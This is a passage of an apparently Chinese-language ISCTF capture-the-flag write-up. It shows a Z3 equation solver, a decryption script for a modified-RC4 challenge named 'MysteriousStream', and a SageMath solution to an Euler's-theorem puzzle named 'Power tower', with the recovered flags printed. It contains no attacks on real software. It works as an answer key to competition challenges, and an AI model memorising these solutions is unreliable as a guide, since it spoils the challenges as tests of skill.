\u65b9\u7a0b2<br>s.add(87*a&#91;22] + 75*a&#91;21] + 73*a&#91;15] + 67*a&#91;14] + 30*a&#91;13] + (a&#91;11] &lt;&lt; 6) + 35*a&#91;9] + 91*a&#91;7] + 91*a&#91;5] + 34*a&#91;3] + 74*a&#91;0] - 89*a&#91;1] - 72*a&#91;2] - 76*a&#91;4] - 32*a&#91;6] - 97*a&#91;8] - 39*a&#91;10] - 23*a&#91;12] + 8*a&#91;16] - 98*a&#91;17] - 4*a&#91;18] - 80*a&#91;19] - 83*a&#91;20] == 7183)<br>\u200b<br># \u65b9\u7a0b3<br>s.add(51*a&#91;21] + 22*a&#91;20] + 15*a&#91;19] + 51*a&#91;17] + 96*a&#91;12] + 34*a&#91;7] + 77*a&#91;5] + 59*a&#91;2] + 89*a&#91;1] + 92*a&#91;0] - 85*a&#91;3] - 50*a&#91;4] - 51*a&#91;6] - 75*a&#91;8] - 40*a&#91;10] - 4*a&#91;11] - 74*a&#91;13] - 98*a&#91;14] - 23*a&#91;15] - 14*a&#91;16] - 92*a&#91;18] - 7*a&#91;22] == -7388)<br>\u200b<br># \u65b9\u7a0b4<br>s.add(61*a&#91;22] + 72*a&#91;21] + 28*a&#91;20] + 55*a&#91;18] + 20*a&#91;17] + 13*a&#91;14] + 51*a&#91;13] + 69*a&#91;12] + 10*a&#91;11] + 95*a&#91;10] + 43*a&#91;9] + 53*a&#91;8] + 76*a&#91;7] + 25*a&#91;6] + 9*a&#91;5] + 10*a&#91;4] + 98*a&#91;1] + 70*a&#91;0] - 22*a&#91;2] + 2*a&#91;3] - 49*a&#91;15] + 4*a&#91;16] - 77*a&#91;19] == 69057)<br>\u200b<br># \u65b9\u7a0b5<br>s.add(7*a&#91;22] + 21*a&#91;16] + 22*a&#91;13] + 55*a&#91;9] + 66*a&#91;8] + 78*a&#91;5] + 10*a&#91;3] + 80*a&#91;1] + 65*a&#91;0] - 20*a&#91;2] - 53*a&#91;4] - 98*a&#91;6] + 8*a&#91;7] - 78*a&#91;10] - 94*a&#91;11] - 93*a&#91;12] - 18*a&#91;14] - 48*a&#91;15] - 9*a&#91;17] - 73*a&#91;18] - 59*a&#91;19] - 68*a&#91;20] - 74*a&#91;21] == -31438)<br>\u200b<br># \u65b9\u7a0b6<br>s.add(33*a&#91;19] + 78*a&#91;15] + 66*a&#91;10] + 3*a&#91;9] + 43*a&#91;4] + 24*a&#91;3] + 3*a&#91;2] + 27*a&#91;0] - 18*a&#91;1] - 46*a&#91;5] - 18*a&#91;6] - a&#91;7] - 33*a&#91;8] - 50*a&#91;11] - 23*a&#91;12] - 37*a&#91;13] - 45*a&#91;14] + 2*a&#91;16] - a&#91;17] - 60*a&#91;18] - 87*a&#91;20] - 72*a&#91;21] - 6*a&#91;22] == -26121)<br>\u200b<br># \u65b9\u7a0b7<br>s.add(31*a&#91;20] + 80*a&#91;18] + 34*a&#91;17] + 34*a&#91;15] + 38*a&#91;14] + 53*a&#91;13] + 35*a&#91;12] + 82*a&#91;9] + 27*a&#91;8] + 80*a&#91;7] + 46*a&#91;6] + 18*a&#91;4] + 5*a&#91;1] + 98*a&#91;0] - 12*a&#91;2] - 9*a&#91;3] - 57*a&#91;5] - 46*a&#91;10] - 31*a&#91;11] - 68*a&#91;16] - 94*a&#91;19] - 93*a&#91;21] - 15*a&#91;22] == 26005)<br>\u200b<br># \u65b9\u7a0b8<br>s.add(81*a&#91;21] + 40*a&#91;20] + 34*a&#91;19] + 94*a&#91;18] + 98*a&#91;17] + 11*a&#91;14] + 63*a&#91;13] + 95*a&#91;12] + 43*a&#91;11] + 99*a&#91;10] + 29*a&#91;9] + 81*a&#91;6] + 72*a&#91;5] + 54*a&#91;3] + 21*a&#91;0] - 26*a&#91;1] - 90*a&#91;2] - 15*a&#91;4] - 54*a&#91;7] - 12*a&#91;8] - 38*a&#91;15] - 15*a&#91;16] - 56*a&#91;22] == 57169)<br>\u200b<br># \u65b9\u7a0b9<br>s.add(71*a&#91;18] + 39*a&#91;17] + 73*a&#91;15] + 14*a&#91;14] + 56*a&#91;12] + 56*a&#91;10] + 27*a&#91;9] + 68*a&#91;7] + 39*a&#91;6] + 26*a&#91;5] + 40*a&#91;4] + 24*a&#91;3] + 11*a&#91;2] + 14*a&#91;1] + 94*a&#91;0] - 10*a&#91;8] - 11*a&#91;11] - 63*a&#91;13] - 39*a&#91;16] - 14*a&#91;19] - 17*a&#91;20] - 23*a&#91;21] - 7*a&#91;22] == 40024)<br>\u200b<br># \u65b9\u7a0b10<br>s.add((a&#91;22] &lt;&lt; 6) + 80*a&#91;21] + 89*a&#91;20] + 70*a&#91;19] + 66*a&#91;18] + 55*a&#91;17] + 16*a&#91;16] + 84*a&#91;13] + 48*a&#91;12] + 11*a&#91;7] + 32*a&#91;5] + 99*a&#91;0] - 26*a&#91;1] - 91*a&#91;2] - 96*a&#91;3] - 63*a&#91;4] - 67*a&#91;6] - 72*a&#91;8] + 4*a&#91;9] - 84*a&#91;10] - 81*a&#91;11] - 80*a&#91;14] - 98*a&#91;15] == 432)<br>\u200b<br># \u65b9\u7a0b11<br>s.add(a&#91;21] + 41*a&#91;17] + 46*a&#91;12] + 44*a&#91;9] + 63*a&#91;0] - 73*a&#91;1] - 43*a&#91;2] + 4*a&#91;3] - 37*a&#91;4] - 54*a&#91;5] - 58*a&#91;6] - 95*a&#91;7] - 2*a&#91;8] - 37*a&#91;10] - 5*a&#91;11] + 2*a&#91;13] - 46*a&#91;14] - 27*a&#91;15] - 19*a&#91;16] - 78*a&#91;18] - 51*a&#91;19] - 82*a&#91;20] - 59*a&#91;22] == -57338)<br>\u200b<br># \u65b9\u7a0b12<br>s.add(10*a&#91;22] + 58*a&#91;18] + 16*a&#91;17] + 69*a&#91;16] + 6*a&#91;15] + 5*a&#91;12] + 87*a&#91;7] + 47*a&#91;5] + 91*a&#91;4] + 54*a&#91;2] + 21*a&#91;1] + 52*a&#91;0] - 76*a&#91;3] - 96*a&#91;6] - 27*a&#91;8] - 43*a&#91;9] - 15*a&#91;10] - 35*a&#91;11] - 53*a&#91;13] + 4*a&#91;14] - 83*a&#91;19] - 68*a&#91;20] - 18*a&#91;21] == 1777)<br>\u200b<br># \u65b9\u7a0b13<br>s.add(66*a&#91;22] + 92*a&#91;21] + 29*a&#91;20] + 42*a&#91;19] + 55*a&#91;14] + 72*a&#91;13] + 40*a&#91;12] + 31*a&#91;10] + 88*a&#91;9] + 61*a&#91;8] + 59*a&#91;7] + 35*a&#91;6] + 16*a&#91;3] + 24*a&#91;1] + 60*a&#91;0] - 55*a&#91;2] - 8*a&#91;4] - 7*a&#91;5] - 17*a&#91;11] - 25*a&#91;15] - 22*a&#91;16] - 10*a&#91;17] - 59*a&#91;18] == 47727)<br>\u200b<br># \u65b9\u7a0b14<br>s.add(3*a&#91;21] + 54*a&#91;18] + 6*a&#91;15] + 93*a&#91;14] + 74*a&#91;10] + 6*a&#91;7] + 98*a&#91;4] + 65*a&#91;3] + 84*a&#91;2] + 18*a&#91;1] + 35*a&#91;0] - 29*a&#91;5] - 40*a&#91;6] - 35*a&#91;8] + 8*a&#91;9] - 15*a&#91;11] - 4*a&#91;12] - 83*a&#91;16] - 74*a&#91;17] - 72*a&#91;19] - 53*a&#91;20] - 31*a&#91;22] == 6695)<br>\u200b<br># \u65b9\u7a0b15<br>s.add(45*a&#91;20] + 14*a&#91;19] + 76*a&#91;18] + 17*a&#91;16] + 86*a&#91;14] + 28*a&#91;11] + 19*a&#91;5] + 46*a&#91;1] + 75*a&#91;0] - 12*a&#91;2] - 27*a&#91;3] - 66*a&#91;4] - 27*a&#91;6] - 32*a&#91;7] - 69*a&#91;8] - 31*a&#91;9] - 65*a&#91;10] - 54*a&#91;12] - 6*a&#91;13] + 2*a&#91;15] - 10*a&#91;17] - 89*a&#91;21] - 16*a&#91;22] == -3780)<br>\u200b<br># \u65b9\u7a0b16<br>s.add(62*a&#91;21] + 74*a&#91;20] + 28*a&#91;18] + 7*a&#91;17] + 74*a&#91;16] + 45*a&#91;15] + 57*a&#91;14] + 34*a&#91;11] + 85*a&#91;10] + 98*a&#91;6] + 29*a&#91;4] + 94*a&#91;3] + 51*a&#91;2] + 85*a&#91;1] - 36*a&#91;5] - a&#91;7] - 3*a&#91;8] - 74*a&#91;9] - 70*a&#91;12] - 68*a&#91;13] - 3*a&#91;19] + 8*a&#91;22] == 47300)<br>\u200b<br># \u65b9\u7a0b17<br>s.add(22*a&#91;22] + 45*a&#91;21] + 14*a&#91;19] + 32*a&#91;18] + 77*a&#91;17] + 70*a&#91;12] + 7*a&#91;10] + 99*a&#91;4] + 82*a&#91;0] - 48*a&#91;1] - 40*a&#91;2] - 81*a&#91;3] - 27*a&#91;5] - 75*a&#91;6] - 79*a&#91;7] - 26*a&#91;8] - 68*a&#91;9] - 57*a&#91;11] - 77*a&#91;13] - 32*a&#91;14] - a&#91;15] - 91*a&#91;16] - 14*a&#91;20] == -34153)<br>\u200b<br># \u65b9\u7a0b18<br>s.add(65*a&#91;21] + 13*a&#91;20] + 61*a&#91;17] + 97*a&#91;13] + 24*a&#91;10] + 40*a&#91;5] + 20*a&#91;0] - 81*a&#91;1] - 17*a&#91;2] - 77*a&#91;3] - 79*a&#91;4] - 45*a&#91;6] - 61*a&#91;7] - 48*a&#91;8] - 97*a&#91;9] - 49*a&#91;11] - 14*a&#91;12] - 81*a&#91;14] - 20*a&#91;15] - 27*a&#91;16] - 89*a&#91;18] - 93*a&#91;19] - 46*a&#91;22] == -55479)<br>\u200b<br># \u65b9\u7a0b19<br>s.add(60*a&#91;21] + 70*a&#91;20] + 13*a&#91;15] + 87*a&#91;13] + 76*a&#91;11] + 88*a&#91;9] + 87*a&#91;3] + 87*a&#91;0] - 97*a&#91;1] - 40*a&#91;2] - 49*a&#91;4] - 23*a&#91;5] - 30*a&#91;6] - 50*a&#91;7] - 98*a&#91;8] - 21*a&#91;10] - 54*a&#91;12] - 65*a&#91;14] - 80*a&#91;17] - 28*a&#91;18] - 57*a&#91;19] - 70*a&#91;22] == -20651)<br>\u200b<br># \u65b9\u7a0b20<br>s.add(54*a&#91;20] + 86*a&#91;17] + 92*a&#91;16] + 41*a&#91;15] + 70*a&#91;10] + 9*a&#91;9] + a&#91;8] + 96*a&#91;7] + 45*a&#91;6] + 78*a&#91;5] + 3*a&#91;4] + 90*a&#91;3] + 71*a&#91;2] + 96*a&#91;0] - 8*a&#91;1] + 4*a&#91;11] - 55*a&#91;12] - 73*a&#91;13] - 54*a&#91;14] - 89*a&#91;18] - (a&#91;19] &lt;&lt; 6) - 67*a&#91;21] + 4*a&#91;22] == 35926)<br>\u200b<br># \u65b9\u7a0b21<br>s.add(5*a&#91;22] + 88*a&#91;20] + 52*a&#91;19] + 21*a&#91;17] + 25*a&#91;16] + 3*a&#91;13] + 88*a&#91;10] + 39*a&#91;8] + 48*a&#91;7] + 74*a&#91;6] + 86*a&#91;4] + 46*a&#91;2] + 17*a&#91;0] - 98*a&#91;1] - 50*a&#91;3] - 28*a&#91;5] - 73*a&#91;9] - 33*a&#91;11] - 75*a&#91;12] - 14*a&#91;14] - 31*a&#91;15] - 26*a&#91;18] - 52*a&#91;21] == 8283)<br>\u200b<br># \u65b9\u7a0b22<br>s.add(96*a&#91;22] + 85*a&#91;20] + 55*a&#91;19] + 99*a&#91;13] + 19*a&#91;11] + 77*a&#91;10] + 52*a&#91;9] + 66*a&#91;8] + 96*a&#91;6] + 72*a&#91;4] + 90*a&#91;3] + 60*a&#91;1] + 94*a&#91;0] - 99*a&#91;2] - 26*a&#91;5] - 94*a&#91;7] - 49*a&#91;12] - 32*a&#91;14] - 54*a&#91;15] - 92*a&#91;16] - 71*a&#91;17] - 63*a&#91;18] - 23*a&#91;21] == 33789)<br>\u200b<br># \u65b9\u7a0b23<br>s.add(15*a&#91;22] + a&#91;19] + 26*a&#91;17] + 65*a&#91;16] + 80*a&#91;11] + 92*a&#91;8] + 28*a&#91;5] + 79*a&#91;4] + 73*a&#91;0] - 98*a&#91;1] - 2*a&#91;2] - 70*a&#91;3] - 10*a&#91;6] - 30*a&#91;7] - 51*a&#91;9] - 77*a&#91;10] - 32*a&#91;12] - 32*a&#91;13] + 8*a&#91;14] + 4*a&#91;15] - 11*a&#91;18] - 83*a&#91;20] - 85*a&#91;21] == -10455)<br>\u200b<br>\u200b<br>print(\"\u5f00\u59cb\u6c42\u89e3...\")<br>if s.check() == sat:<br> &nbsp;  print(\"\u627e\u5230\u89e3\uff01\")<br> &nbsp;  m = s.model()<br> &nbsp; &nbsp;<br> &nbsp;  # \u83b7\u53d6\u89e3\u5e76\u8f6c\u6362\u4e3a\u5b57\u8282<br> &nbsp;  solution = &#91;m&#91;a&#91;i]].as_long() for i in range(23)]<br> &nbsp; &nbsp;<br> &nbsp;  print(\"\u5f02\u6216\u540e\u7684\u503c:\", solution)<br> &nbsp;  print(\"\u5f02\u6216\u540e\u7684\u5b57\u7b26\u4e32:\", ''.join(&#91;chr(c) for c in solution]))<br> &nbsp; &nbsp;<br> &nbsp;  original = &#91;c ^ 0xC for c in solution]<br> &nbsp;  print(\"\u539f\u59cbflag:\", ''.join(&#91;chr(c) for c in original]))<br>else:<br> &nbsp;  print(\"\u65e0\u89e3\")<br> &nbsp;  print(s.check())<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">MysteriousStream<\/h2>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u521d\u6b65\u5206\u6790<\/strong><\/li>\n<\/ol>\n\n\n\n<p>\u62ff\u5230\u9898\u76ee\u540e\uff0c\u5305\u542b\u4e00\u4e2a\u4e8c\u8fdb\u5236\u6587\u4ef6 <code>challenge<\/code> \u548c\u4e00\u4e2a\u6570\u636e\u6587\u4ef6 <code>payload.dat<\/code>\u3002 \u9996\u5148\u67e5\u770b <code>challenge<\/code> \u7684\u5b57\u7b26\u4e32\u4fe1\u606f\uff0c\u53d1\u73b0\u4e86\u51e0\u4e2a\u5173\u952e\u5b57\u7b26\u4e32\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>Secr3tK3<\/code><\/li>\n\n\n\n<li><code>P4ssXOR<\/code><\/li>\n\n\n\n<li><code>rc4_variant<\/code><\/li>\n\n\n\n<li><code>xor_cycle<\/code><\/li>\n<\/ul>\n\n\n\n<p>\u8fd9\u4e9b\u5b57\u7b26\u4e32\u6697\u793a\u4e86\u9898\u76ee\u53ef\u80fd\u6d89\u53ca RC4 \u52a0\u5bc6\u53d8\u79cd\u4ee5\u53ca\u5f02\u6216\u64cd\u4f5c\u3002<\/p>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li><strong>\u9006\u5411\u5206\u6790<\/strong><\/li>\n<\/ol>\n\n\n\n<p>\u4f7f\u7528 IDA \u6216\u53cd\u6c47\u7f16\u5de5\u5177\u5206\u6790\u4e3b\u8981\u903b\u8f91\uff08\u7ed3\u5408\u52a8\u6001\u8c03\u8bd5\u6216\u9759\u6001\u5206\u6790\uff09\uff1a<\/p>\n\n\n\n<p>\u5bc6\u94a5\u6784\u5efa<\/p>\n\n\n\n<p>\u5728\u4ee3\u7801\u4e2d\u53d1\u73b0\u5bf9 <code>Secr3tK3<\/code> \u7684\u5904\u7406\u3002\u7a0b\u5e8f\u5e76\u4e0d\u662f\u76f4\u63a5\u4f7f\u7528 <code>Secr3tK3<\/code>\uff0c\u800c\u5728\u5176\u540e\u62fc\u63a5\u4e86 <code>y!<\/code> (0x79, 0x21)\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">mov word ptr [rsp + 0x16], 0x2179 &nbsp;; \u8ffd\u52a0 \"y!\"<\/pre>\n\n\n\n<p>\u6240\u4ee5 RC4 \u7684\u5b9e\u9645\u5bc6\u94a5\u4e3a <code>Secr3tK3y!<\/code>\u3002<\/p>\n\n\n\n<p><strong>\u52a0\u5bc6\u903b\u8f91<\/strong><\/p>\n\n\n\n<p>\u7a0b\u5e8f\u4e3b\u8981\u6d41\u7a0b\u662f\u5bf9\u8f93\u5165\u6570\u636e\u8fdb\u884c\u4e24\u6b65\u64cd\u4f5c\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>RC4 \u53d8\u79cd\u89e3\u5bc6<\/strong><\/li>\n\n\n\n<li><strong>\u5faa\u73af\u5f02\u6216 (XOR Cycle)<\/strong><\/li>\n<\/ol>\n\n\n\n<p><strong>RC4 \u53d8\u79cd\u5206\u6790<\/strong>\uff1a \u6807\u51c6\u7684 RC4 KSA\uff08\u5bc6\u94a5\u8c03\u5ea6\u7b97\u6cd5\uff09\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>j = (j + S&#91;i] + key&#91;i % len(key)]) % 256<\/code><\/pre>\n\n\n\n<p>\u4f46\u5728\u672c\u9898\u7684\u6c47\u7f16\u4ee3\u7801\u4e2d\uff0cKSA \u589e\u52a0\u4e86\u4e00\u4e2a\u989d\u5916\u7684\u9879 <code>(i &amp; 0xAA)<\/code>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mov edx, ecx<br>and edx, 0xaa<br>add eax, edx ; eax \u7d2f\u52a0\u4e86 (i &amp; 0xAA)<\/code><\/pre>\n\n\n\n<p>\u8fd8\u539f\u540e\u7684 KSA \u903b\u8f91\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>j = (j + S&#91;i] + key&#91;i % len(key)] + (i &amp; 0xAA)) % 256<\/code><\/pre>\n\n\n\n<p>PRGA\uff08\u4f2a\u968f\u673a\u6570\u751f\u6210\uff09\u90e8\u5206\u4e0e\u6807\u51c6 RC4 \u4e00\u81f4\u3002<\/p>\n\n\n\n<p><strong>XOR Cycle \u5206\u6790<\/strong>\uff1a RC4 \u5904\u7406\u540e\u7684\u6570\u636e\uff0c\u4e0e\u5bc6\u94a5 <code>P4ssXOR<\/code> \u8fdb\u884c\u5faa\u73af\u5f02\u6216\u3002<\/p>\n\n\n\n<p><strong>3. \u89e3\u5bc6\u811a\u672c<\/strong><\/p>\n\n\n\n<p>\u6839\u636e\u5206\u6790\u7684\u903b\u8f91\uff0c\u7f16\u5199 Python \u811a\u672c\u89e3\u5bc6 <code>payload.dat<\/code>\u3002\u7531\u4e8e\u6d41\u5bc6\u7801\uff08RC4\uff09\u548c\u5f02\u6216\u8fd0\u7b97\u90fd\u662f\u5bf9\u79f0\u7684\uff08\u6216\u81ea\u53cd\u7684\uff09\uff0c\u5982\u679c\u7a0b\u5e8f\u662f\u201c\u89e3\u5bc6\u5e76\u6253\u5370\u201d\uff0c\u6211\u4eec\u53ea\u9700\u8981\u91cd\u73b0\u7a0b\u5e8f\u7684\u903b\u8f91\u5373\u53ef\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import binascii<br>\u200b<br>def solve():<br> &nbsp; &nbsp;# 1. \u8bfb\u53d6 payload<br> &nbsp; &nbsp;# payload.dat \u7684\u5341\u516d\u8fdb\u5236\u5185\u5bb9<br> &nbsp; &nbsp;payload_hex = \"f1c652acab33ee6873cea53f0e0eb7fdc731be9aa7e8d41fe04b3154ff7cccd2160b4034e6b815bf\"<br> &nbsp; &nbsp;data = binascii.unhexlify(payload_hex)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# 2. \u51c6\u5907\u5bc6\u94a5<br> &nbsp; &nbsp;key_rc4 = b\"Secr3tK3y!\" &nbsp;# \u8fd0\u884c\u65f6\u6784\u5efa\u7684\u5bc6\u94a5<br> &nbsp; &nbsp;key_xor = b\"P4ssXOR\" &nbsp; &nbsp; # \u9759\u6001\u5b57\u7b26\u4e32<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# 3. RC4 \u53d8\u79cd\u521d\u59cb\u5316 (KSA)<br> &nbsp; &nbsp;S = list(range(256))<br> &nbsp; &nbsp;j = 0<br> &nbsp; &nbsp;for i in range(256):<br> &nbsp; &nbsp; &nbsp; &nbsp;# \u53d8\u79cd\u903b\u8f91\uff1a\u589e\u52a0\u4e86 (i &amp; 0xAA)<br> &nbsp; &nbsp; &nbsp; &nbsp;j = (j + S&#91;i] + key_rc4&#91;i % len(key_rc4)] + (i &amp; 0xAA)) % 256<br> &nbsp; &nbsp; &nbsp; &nbsp;S&#91;i], S&#91;j] = S&#91;j], S&#91;i]<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;# 4. RC4 \u89e3\u5bc6 (PRGA)<br> &nbsp; &nbsp;i = 0<br> &nbsp; &nbsp;j = 0<br> &nbsp; &nbsp;rc4_output = &#91;]<br> &nbsp; &nbsp;for char in data:<br> &nbsp; &nbsp; &nbsp; &nbsp;i = (i + 1) % 256<br> &nbsp; &nbsp; &nbsp; &nbsp;j = (j + S&#91;i]) % 256<br> &nbsp; &nbsp; &nbsp; &nbsp;S&#91;i], S&#91;j] = S&#91;j], S&#91;i]<br> &nbsp; &nbsp; &nbsp; &nbsp;k = S&#91;(S&#91;i] + S&#91;j]) % 256]<br> &nbsp; &nbsp; &nbsp; &nbsp;rc4_output.append(char ^ k)<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;# 5. XOR Cycle \u89e3\u5bc6<br> &nbsp; &nbsp;flag = &#91;]<br> &nbsp; &nbsp;for idx, char in enumerate(rc4_output):<br> &nbsp; &nbsp; &nbsp; &nbsp;k = key_xor&#91;idx % len(key_xor)]<br> &nbsp; &nbsp; &nbsp; &nbsp;flag.append(char ^ k)<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;print(bytes(flag).decode('utf-8'))<br>\u200b<br>if __name__ == \"__main__\":<br> &nbsp; &nbsp;solve()<\/code><\/pre>\n\n\n\n<p><strong>4. \u83b7\u53d6 Flag<\/strong><\/p>\n\n\n\n<p>\u8fd0\u884c\u811a\u672c\u8f93\u51fa\u6700\u7ec8 Flag\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ISCTF{Y0u_a2e_2ea11y_a_1aby2inth_master}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Power tower<\/h2>\n\n\n\n<p>\u9898\u76ee\u7ed9\u51fa\u4e86\u4e00\u4e2a\u52a0\u5bc6\u811a\u672c\u548c\u4e09\u4e2a\u503c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from Crypto.Util.number import *<br>import random<br>\u200b<br>m = b'ISCTF{****************}'<br>flag = bytes_to_long(m)<br>n = getPrime(256)<br>t = getPrime(63)<br>l = pow(2, pow(2, t), n)<br>c = flag ^ l<br>print(t)<br>print(n)<br>print(c)<\/code><\/pre>\n\n\n\n<p><strong>\u5df2\u77e5\u6761\u4ef6\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>t = 6039738711082505929<\/code><\/li>\n\n\n\n<li><code>n = 107502945843251244337535082460697583639357473016005252008262865481138355040617<\/code><\/li>\n\n\n\n<li><code>c = 114092817888610184061306568177474033648737936326143099257250807529088213565247<\/code><\/li>\n<\/ul>\n\n\n\n<p><strong>\u52a0\u5bc6\u8fc7\u7a0b\uff1a<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5c06 flag \u8f6c\u6362\u4e3a\u957f\u6574\u6570<\/li>\n\n\n\n<li>\u751f\u6210\u4e24\u4e2a\u968f\u673a\u7d20\u6570\uff1a<code>n<\/code> (256\u4f4d) \u548c <code>t<\/code> (63\u4f4d)<\/li>\n\n\n\n<li>\u8ba1\u7b97 <code>l = 2^(2^t) mod n<\/code>\uff08\u8fd9\u662f\u4e00\u4e2a\u5e42\u5854\u7ed3\u6784\uff09<\/li>\n\n\n\n<li>\u8ba1\u7b97\u5bc6\u6587 <code>c = flag XOR l<\/code><\/li>\n<\/ol>\n\n\n\n<p>\u89e3\u9898\u601d\u8def<\/p>\n\n\n\n<p>\u8981\u89e3\u5bc6 flag\uff0c\u9700\u8981\u8ba1\u7b97 <code>l = 2^(2^t) mod n<\/code>\uff0c\u7136\u540e\u901a\u8fc7 <code>flag = c XOR l<\/code> \u5f97\u5230 flag\u3002<\/p>\n\n\n\n<p>\u4f46\u662f <code>2^t<\/code> \u662f\u4e00\u4e2a\u5929\u6587\u6570\u5b57\uff08<code>2^6039738711082505929<\/code>\uff09\uff0c\u65e0\u6cd5\u76f4\u63a5\u8ba1\u7b97\u3002\u6211\u4eec\u9700\u8981\u4f7f\u7528<strong>\u6b27\u62c9\u5b9a\u7406<\/strong>\u6765\u7b80\u5316\u8fd9\u4e2a\u8ba1\u7b97\u3002<\/p>\n\n\n\n<p><strong>\u6b27\u62c9\u5b9a\u7406\uff1a<\/strong> \u5982\u679c <code>gcd(a, n) = 1<\/code>\uff0c\u5219 <code>a^\u03c6(n) \u2261 1 (mod n)<\/code><\/p>\n\n\n\n<p>\u5176\u4e2d <code>\u03c6(n)<\/code> \u662f\u6b27\u62c9\u51fd\u6570\uff0c\u8868\u793a\u5c0f\u4e8e <code>n<\/code> \u4e14\u4e0e <code>n<\/code> \u4e92\u8d28\u7684\u6b63\u6574\u6570\u7684\u4e2a\u6570\u3002<\/p>\n\n\n\n<p><strong>\u5e94\u7528\uff1a<\/strong><\/p>\n\n\n\n<p>\u5bf9\u4e8e <code>2^(2^t) mod n<\/code>\uff0c\u5982\u679c <code>gcd(2, n) = 1<\/code>\uff08\u901a\u5e38\u6210\u7acb\uff0c\u56e0\u4e3a <code>n<\/code> \u662f\u5947\u6570\uff09\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u6b27\u62c9\u5b9a\u7406\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">2^(2^t) mod n = 2^(2^t mod \u03c6(n)) mod n<\/pre>\n\n\n\n<p>\u8fd9\u6837\uff0c\u6211\u4eec\u53ea\u9700\u8981\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5206\u89e3 <code>n<\/code> \u5f97\u5230\u5176\u56e0\u5b50<\/li>\n\n\n\n<li>\u8ba1\u7b97 <code>\u03c6(n)<\/code><\/li>\n\n\n\n<li>\u8ba1\u7b97 <code>2^t mod \u03c6(n)<\/code>\uff08\u8fd9\u4e2a\u53ef\u4ee5\u8ba1\u7b97\uff0c\u56e0\u4e3a <code>\u03c6(n) &lt; n<\/code>\uff09<\/li>\n\n\n\n<li>\u8ba1\u7b97 <code>2^(2^t mod \u03c6(n)) mod n<\/code><\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-preformatted\">#!\/usr\/bin\/env sage<br># -*- coding: utf-8 -*-<br>\u200b<br>\"\"\"<br>Power Tower \u89e3\u5bc6\u811a\u672c<br>\u4f7f\u7528 SageMath \u8fdb\u884c\u5927\u6570\u5206\u89e3\u548c\u6a21\u5e42\u8fd0\u7b97<br>\"\"\"<br>\u200b<br># \u7ed9\u5b9a\u7684\u503c<br>t = 6039738711082505929<br>n = 107502945843251244337535082460697583639357473016005252008262865481138355040617<br>c = 114092817888610184061306568177474033648737936326143099257250807529088213565247<br>\u200b<br>print(\"=\" * 60)<br>print(\"Power Tower \u89e3\u5bc6\")<br>print(\"=\" * 60)<br>print(\"t = \" + str(t))<br>print(\"n = \" + str(n))<br>print(\"c = \" + str(c))<br>print()<br>\u200b<br># \u5c06 n \u8f6c\u6362\u4e3a SageMath \u6574\u6570<br>n = Integer(n)<br>c = Integer(c)<br>t = Integer(t)<br>\u200b<br># \u5206\u89e3 n<br>print(\"\u6b63\u5728\u5206\u89e3 n...\")<br>try:<br> &nbsp;  factors = factor(n)<br> &nbsp;  print(\"n \u7684\u56e0\u5b50\u5206\u89e3: \" + str(factors))<br> &nbsp; &nbsp;<br> &nbsp;  # \u8ba1\u7b97\u6b27\u62c9\u51fd\u6570 \u03c6(n)<br> &nbsp;  phi_n = euler_phi(n)<br> &nbsp;  print(\"\u03c6(n) = \" + str(phi_n))<br>except Exception as e:<br> &nbsp;  print(\"\u5206\u89e3\u5931\u8d25: \" + str(e))<br> &nbsp;  # \u5982\u679c\u65e0\u6cd5\u5206\u89e3\uff0c\u5047\u8bbe n \u662f\u7d20\u6570<br> &nbsp;  print(\"\u5047\u8bbe n \u662f\u7d20\u6570\")<br> &nbsp;  phi_n = n - 1<br>\u200b<br>print()<br>\u200b<br># \u8ba1\u7b97 2^t mod \u03c6(n)<br>print(\"\u8ba1\u7b97 2^t mod \u03c6(n)...\")<br>exp_mod_phi = power_mod(2, t, phi_n)<br>print(\"2^t mod \u03c6(n) = \" + str(exp_mod_phi))<br>\u200b<br># \u8ba1\u7b97 l = 2^(2^t) mod n = 2^(2^t mod \u03c6(n)) mod n<br>print()<br>print(\"\u8ba1\u7b97 l = 2^(2^t mod \u03c6(n)) mod n...\")<br>l = power_mod(2, exp_mod_phi, n)<br>print(\"l = \" + str(l))<br>\u200b<br># \u89e3\u5bc6: flag = c ^ l<br>print()<br>print(\"\u89e3\u5bc6 flag...\")<br>flag_long = c ^^ l  # SageMath \u4e2d\u7684\u5f02\u6216\u8fd0\u7b97\u7b26<br>print(\"flag (\u6574\u6570) = \" + str(flag_long))<br>\u200b<br># \u8f6c\u6362\u4e3a\u5b57\u8282<br>print()<br>print(\"\u8f6c\u6362\u4e3a\u5b57\u8282...\")<br># \u5c06\u6574\u6570\u8f6c\u6362\u4e3a\u5b57\u8282\u5217\u8868<br>flag_digits = flag_long.digits(256)<br>flag_bytes = bytes(reversed(flag_digits))<br>\u200b<br>try:<br> &nbsp;  flag_str = flag_bytes.decode('utf-8', errors='ignore')<br> &nbsp;  print(\"\\n\" + \"=\" * 60)<br> &nbsp;  print(\"\u89e3\u5bc6\u540e\u7684 flag: \" + flag_str)<br> 